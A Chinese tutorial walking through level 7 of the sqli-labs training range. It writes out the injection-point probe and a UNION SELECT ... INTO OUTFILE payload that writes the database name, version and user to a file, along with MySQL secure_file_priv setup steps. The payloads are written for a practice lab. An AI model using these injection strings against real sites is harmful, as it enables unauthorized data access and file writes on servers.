sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置

复制代码
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 7

复制代码
SQLI DUMB SERIES-7

判断注入点

进入页面中,并输入数据查看结果。

发现空数据提示语法问题

输入单引号会提示语法问题。

经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。

只有列号为3的时候,才能正常显示,则字段长度为3。

sql 复制代码
http://sqli-labs.com/Less-7/
?id=1')) order by 3 --+

注入

复制代码
SELECT column1 FROM table_name INTO OUTFILE 'file_path'
OUTFILE命令可以将查询结果导出为文本文件,CSV文件等多种格式。
注意:使用这个功能需要提前开启权限。你可以前往MySQL的源文件目录中,
	打开my.ini配置文件,并修改其中的`secure_file_priv='D://'`
	参数设置为你的安全目录。(请设置为C盘以外的磁盘,避免系统权限问题。)
	修改完成并重启后在MySQL命令行中输入`show variables like '%secure%';`查看是否设置成功。

根据页面的提示我们也可以采用outfile的方式进行注入:

c 复制代码
http://sqli-labs.com/Less-7/
?id=1')) union select database(),version(),user() from dual into outfile "d:\\project\\sqli-labs-master\\Less-7\\1.txt" --+
sql 复制代码
SELECT * FROM users WHERE id=(('id=1')) union select version(),database(),user() into outfile "D:\\project\\sqli-labs-master\\Less-7\\1.txt";

打开文件看一下效果:

至此,注入成功。

系列文章

相关推荐
HackTwoHub7 分钟前
开源AI渗透测试的终极形态,让渗透测试进入“自动驾驶“时代、让渗透测试全自动!
人工智能·web安全·网络安全·开源·系统安全·安全架构·sql注入
薛定e的猫咪13 分钟前
OOD 感知决策与可信强化学习:从置信度评估到安全回退
人工智能·安全·机器学习·开源
Chockmans14 分钟前
春秋云境CVE-2021-3019
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2021-3019
2401_8784545320 分钟前
HTML和CSS的复习2
前端·css·html
We་ct28 分钟前
吃透现代CSS全技术体系
前端·css·css3·sass·postcss·预处理器
ZC跨境爬虫28 分钟前
跟着 MDN 学 HTML day_11:(语义化容器全站重构+独立CSS拆分+字体合规引入)
前端·css·ui·重构·html·edge浏览器
何何____29 分钟前
flex布局介绍
css
ZC跨境爬虫31 分钟前
跟着 MDN 学 HTML day_10:(超链接核心语法+路径规则)
前端·css·笔记·ui·html·edge浏览器
GISer_Jing34 分钟前
AI原生前端工程化进阶实践:从流式交互架构到端云协同全链路落地
前端·人工智能·后端·学习
被考核重击37 分钟前
Vue响应式原理(下)
前端·javascript·vue.js